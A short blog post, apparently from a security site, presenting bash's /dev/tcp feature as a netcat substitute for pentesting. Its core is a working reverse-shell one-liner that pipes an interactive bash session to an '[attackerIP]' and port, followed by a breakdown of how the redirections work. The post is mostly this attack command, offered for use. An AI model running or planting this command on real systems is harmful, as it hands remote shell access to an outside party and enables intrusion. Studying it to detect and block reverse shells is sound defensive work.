Netcat alternative: /dev/tcp

Netcat with no netcat: /dev/tcp.

This is a feature of bash (on most systems) that allows command interaction with the TCP stack of the machine. Data can be dumped into /dev/tcp/ipAddress/port, and bash will make the TCP connection with the data. You can leverage this to send a command shell across the network to a listener by invoking the following command:

/bin/bash -i > /dev/tcp/[attackerIP]/[port] 0<&1 2>&1

Here’s the breakdown:

Bash is being invoked in interactive (-i) mode and redirecting its output to /dev/tcp, which tells the system to make a TCP connection to a given IP on a given port. The 0<&1 2>&1 tells the system to duplicate the standard output and error file descriptors and connect them to the standard in of bash.

Leave a Reply

Your email address will not be published. Required fields are marked *